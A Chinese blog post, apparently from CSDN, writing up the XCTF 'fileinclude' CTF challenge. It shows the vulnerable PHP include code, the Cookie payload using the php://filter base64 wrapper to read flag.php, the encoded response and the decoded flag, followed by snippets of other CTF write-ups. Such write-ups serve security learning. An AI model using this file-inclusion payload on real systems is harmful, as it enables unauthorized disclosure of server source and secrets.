XCTF:fileinclude[WriteUP]

最新推荐文章于 2024-04-10 14:02:31 发布
最新推荐文章于 2024-04-10 14:02:31 发布
阅读量354 收藏
点赞数 18
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43007452/article/details/134828287
版权

Ctrl+U查看页面源码

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>

<br />
<b>Notice</b>:  Undefined index: language in <b>/var/www/html/index.php</b> on line <b>9</b><br />
Please choose the language you want : English or Chinese
<h1>Hi,EveryOne,The flag is in flag.php</h1><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>

<?php
if( !ini_get('display_errors') ) {
  ini_set('display_errors', 'On');
  }
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{
	@setcookie("language","english");
	@include("english.php");
}
else
{
	@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>
</html></html>

分析:

$lan变量的值由$_COOKIE['language']传递

当!$lan时:即$lan变量不存在时,执行包含english.php

否则,包含 lan.php 文件

那么只需要抓包,修改$_COOKIE中language的值传递给$lan就可以了

 再根据题目的提示,flag在flag.php这个文件中

可以利用php伪协议,将被包含文件读取或写入包含文件中

接下来贴上php伪协议构造代码

php://filter/read=convert.base64-encode/resource=flag

其中:

index.php源码:@include($lan.".php");已经存在后缀.php

所以最后的文件名称是flag而不是flag.php

read:<读链的筛选列表> :参数可选

write:<写链的筛选列表> : 参数可选

/resource=FILE.php:<选定文件> : 参数必选

convert.base64-encode:过滤器,防止网页将源码注释而导致的flag无法显示

因为flag.php是已经存在的,直接用读取read

就可以读取到被包含在index.php中的flag.php源码

 

 

打开BurpSuite对网页内容进行拦截,并发送至重放器

构造一个Cookie并将其language的值设置为用伪协议构造的flag

那么index.php就会直接包含flag.php文件

Cookie: language=php://filter/read=convert.base64-encode/resource=flag

 

 

点击发送,查看重放响应内容

得到flag.php中的内容
 

PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezRhMTRiN2E0ZDFmYjMzZjFlMjc3ZDIxNWU2NzdlZmY2fSI7DQo/Pg==

因为我们上面伪协议中用的过滤器是base64编码

所以只需要进行一次base64解码就可以拿到原文

cyberpeace{4a14b7a4d1fb33f1e277d215e677eff6} 

0DayHP
关注
Web for pentester_writeup之File Include
ditanji3425的博客
08-08 291
Web for pentester_writeup之File IncludeFile Include(文件包涵) Example 1 加一个单引号 从报错中我们可以获取如下信息: 当前文件执行的代码路径: /var/www/fileincl/example1.php 文件包含代码引用函数 include() 代码引用的文件路径:include_path= /usr/share/p...
XCTFfileclude[WriteUP]
如有错误感谢斧正
12-06 200
2.利用php://input输入流,将"hello ctf"以post的方式将字符串提交给file2。1.利用php伪协议filter,使flag.php的值读取进入到file1中。(我这里的HackBar(v2.1.3)不知什么原因无法使用post功能)1.include包含的flag.php文件中应该存放着flag的值。判断file2中的字符串值是否与"hello ctf"全等。3.将第1点和第2点两段代码进行结合(用&连接)判断file1和file2是否已被创建。
XCTF:warmup[WriteUP]
如有错误感谢斧正
01-31 2004
所以当我们构造的url进入checkFile时,$page和$_page的值就会一直等于‘hint.php?’不存在,则$page整体都将被截取,则?file=******************使$page在$whitelist中,则必须是source.php或者hint.php才判定为真。’,所以变成:url/?且经过截取后,问号前面的值也一定还会等于‘hint.php?考虑该文件应该不在hint.php的同目录,所以应该是在根目录。
XCTF:warmup[WriteUP],分享PDF高清版
m0_60607971的博客
04-08 563
if!’, ‘?’, ‘?’)
攻防世界 web php include,XCTF攻防世界 Web Writeup (持续更新中)
weixin_27875131的博客
03-09 418
新手练习区view-sourceF12得到flag。get_postHackBar一把梭。robots访问robots.txt发现隐藏文件,进入该文件获得flag。backupindex.php的备份文件应该是index.php.bak,访问一下发现果然是,用记事本打开下载的文件得到flag。cookie看一下请求头发现cookie.php访问cookie.php,在响应头中有flag。disab...
XCTF:warmup[WriteUP],腾讯、美团网络安全面试经验分享
2401_84185145的博客
04-10 333
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
XCTF:warmup[WriteUP](1),看完我工资从12K变成了20K
m0_60607971的博客
04-08 843
if (!
XCTF嘉年华 re1 Writeup
煮酒闲谈
10-17 1247
摘要CTF解题 > XCTF嘉年华体验赛>> re1Reverse 题目描述 Github https://github.com/Cherishaoit’s easy 文件后缀是个.ppp,感觉是个二进制文件,放到kali下查看一下(用file命令查看)。 root@kali:file 1bc87216-beb5-4e56-a7b5-2955d2a200b6.ppp由结果知,是一个32位
XCTF高手进阶区】web4_Web_php_include writeup(一)
Mitchell_Donovan的博客
01-27 363
web4_Web_php_include 原题链接 key:文件包含 ①页面打开后是一串php代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 先来简单了解一下本题涉及到的几个ph
XCTF:NewsCenter
m0_64898960的博客
03-18 4120
xctf 因为有输入框,我习惯初步判断它为sql注入 1.测试是否存在注入点,输入 1' 结果报错了,然后尝试 1" 2.知道存在注入,且为字符型注入。然后进行字段数猜测 直到字段数为4开始报错 3.尝试获得显示位 4.查库名 5.查表名 6.查列名 7.获取flag 到这里本题就已经解出来了,下面是我在上面用到的sql语句。 1' 1" 1'order by 1# -1'union select 1,2,3# -1'uni...
xctf攻防世界game writeup
qq_42983283的博客
11-04 344
下载,查看: 载入ida,f5分析,发现sub_457AB4那里很可能是答案: void main_0() { signed int i; // [esp+DCh] [ebp-20h] int v1; // [esp+F4h] [ebp-8h] sub_45A7BE(&unk_50B110); sub_45A7BE(&unk_50B158); sub_45A7BE(&unk_50B1A0); sub_45A7BE(&unk_50B1E8..
xctf攻防世界Shuffle writeup
qq_42983283的博客
11-11 128
下载查看: ida打开分析: int __cdecl main(int argc, const char **argv, const char **envp) { time_t v3; // ebx __pid_t v4; // eax unsigned int v5; // ST18_4 unsigned int v6; // ST1C_4 char v7; // ST20_1 signed int i; // [esp+14h] [ebp-44h] char s; // .
xctf_pwn welpwn writeup
yagamilaido的博客
05-16 409
xctf_pwn3 welpwn 文章目录xctf_pwn3 welpwn程序分析exp思路 程序分析 惯例查信息 程序逻辑简单粗暴,读0x400字节(这里无法溢出)。 然后echo中打印,打印前拷贝到16字节数组中,存在栈溢出 3、考虑x86_64下著名万能ROP,一直没怎么用过这次拿来练练手(捂脸) _libc_csu_init 函数下的 pop&call ​ 注意 0x0000000000400880,可知道 r13、r14、r15 分别对应前三个参数,r12保存调用地址的
XCTF:Web – I-got-id-200 (Perl语言与linux命令)
wssmiss的博客
04-19 603
Perl语法及特性学习和web CGI接口编程,linux命令以及管道操作 初窥题目 打开网站有三个指向网页 第一个网页是个pl页面,而且可以发现url处,不是我们常见的php语言,jsp,asp语言。而是.pl后缀,查了一下是perl语言。 Perl:一种脚本语言,也是胶水语言,拥有巨大的第三方库CPAN,可以用来做web编程,而且对于文件操作方便快捷。 第二个网页是个表...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
家政服务管理平台 源码+数据库+论文(JAVA+SpringBoot+Vue.JS+MySQL).zip
最新发布
10-02
家政服务管理平台 源码+数据库+论文(JAVA+SpringBoot+Vue.JS+MySQL) 启动教程:https://www.bilibili.com/video/BV11ktveuE2d
基于SpringBoot和Bootstrap的Kettle 8.3任务调度系统设计源码
10-02
该项目是一款基于SpringBoot和Bootstrap框架构建的Kettle 8.3任务调度系统源码,包含675个文件,涵盖256个JavaScript文件、198个Java源文件、51个PNG图片文件、34个CSS文件、31个HTML文件、30个GIF文件、11个JPG文件、9个XML文件、7个YML文件、7个TXT文件。系统后端利用SpringBoot框架实现,前端界面采用Bootstrap设计,同时借鉴了zhaxiaodong9860的代码并进行优化,提供便捷的页面管理功能。后台代码基于Kettle 8.3 API进行工具化编写,旨在提升使用效率。
实例程序原理图加文档MSP430单片机51单片机室内环境检测仪
10-02
实例程序原理图加文档MSP430单片机51单片机室内环境检测仪
XCTF移动应用逆向分析:解密安卓app2
作者提供了一个名为XCTF-mobile app2的安卓应用作为示例,用于教学如何进行逆向分析并找到隐藏的flag。" 在安卓逆向工程中,首要步骤是获取应用程序的内部数据。在这个案例中,首先需要将APK安装包的后缀更改为.zip...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0DayHP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值